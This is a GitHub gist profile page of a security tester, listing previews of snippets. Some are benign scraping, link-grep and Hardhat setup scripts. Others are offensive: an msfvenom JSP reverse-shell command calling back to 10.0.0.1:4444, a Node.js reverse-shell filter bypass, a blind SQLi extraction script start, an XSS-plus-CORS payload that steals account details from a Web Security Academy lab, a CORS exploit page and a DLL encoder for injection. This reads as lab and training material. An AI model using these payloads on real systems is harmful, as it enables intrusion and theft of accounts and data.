Skip to content

Instantly share code, notes, and snippets.

View enderphan94's full-sized avatar
🏠
Working from home

Ender Loc Phan enderphan94

🏠
Working from home
View GitHub Profile
@enderphan94
enderphan94 / exLib.js
Created December 12, 2023 01:39
Extract all libraries of a website
//npm install puppeteer
const puppeteer = require('puppeteer');
(async () => {
const browser = await puppeteer.launch({ headless: "new" });
const page = await browser.newPage();
await page.goto('https://www.pikakasino.com/', { timeout: 60000 }); // 60 seconds
@enderphan94
enderphan94 / grephttp
Created March 9, 2023 02:44
Extract links in web source
cat file | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*
@enderphan94
enderphan94 / gethat.sh
Last active March 18, 2024 03:36
Setting up a hardhat project
#!/bin/bash
npm init --yes
npm install --save-dev hardhat
touch hardhat.config.js
npm install --save-dev @nomiclabs/hardhat-ethers ethers @nomiclabs/hardhat-waffle ethereum-waffle chai
echo "require('@nomiclabs/hardhat-waffle');" > hardhat.config.js
mkdir contracts
mkdir test
npx hardhat compile

Author: [email protected]

Foreword

The documents aim to recap my experience in smart contract automated testing besides the manual testing. I also put the issues that I faced during the execution, indeed, solutions are given.

Connecting with Remix from localhost

For a complex project, you can't just copy paste the single sol file and let it run. To make our life easier, Remix has localhost connection which allows you to interact with your project in your local machine remotely.

@enderphan94
enderphan94 / Extract_Blind_SQLi.py
Last active September 27, 2020 05:37
Burp Suite Web Academy
import requests,sys
requests.packages.urllib3.\
disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
def sql_engine(payload):
proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
@enderphan94
enderphan94 / README.md
Last active September 19, 2020 16:16
windows and Linux jsp reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f raw > shell.jsp

@enderphan94
enderphan94 / Readme.md
Last active September 12, 2020 08:06
Reverse Shell in nodejs #nodejs #shell

JavaScript strings can by design be composed of hex-encoded characters, in addition to other encodings. So we should be able to hex-encode our forward slashes and bypass the restrictions of the regex parsing. We gotta do some hex-encoding scheme to the cmd string

\\x2fbin\\x2fbash

e.g:

POST /users HTTP/1.1
Host: 172.118.132.4
@enderphan94
enderphan94 / dll_encoder.py
Created August 26, 2020 03:57
Endode dll file to base64 #dll #dllinjection #base64dll
#!/usr/bin/python
# DLL Encoder - Insecurety Research
import sys
print "Encodes a DLL as a base64 encoded textfile"
if (len(sys.argv) != 3):
print "Usage: %s <Path To DLL> <Outfile>" %(sys.argv[0])
print "Eg: %s C:\\windows\win32.dll encoded.txt" %(sys.argv[0])
sys.exit(0)
@enderphan94
enderphan94 / xss_cors.js
Created August 13, 2020 14:20
XSS CORS payload in one line #xss #cors
<script>var req = new XMLHttpRequest(); req.open('get','https://acb01fc81f8f9958806a0dee004900a5.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send();</script>
//https://trusted-origin.example.com/?xss=<script>CORS-ATTACK-PAYLOAD</script>
//if it does not pop-up, double-check in the console
@enderphan94
enderphan94 / CORS.html
Created August 13, 2020 14:17
CORS vulnerability exploit #cors https://enderspub.kubertu.com/cors
<html>
<body>
<h2>CORS Exploit</h2>
<p>https://gist.github.com/enderphan94</p>
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
<script>
function cors() {
var xhr = new XMLHttpRequest();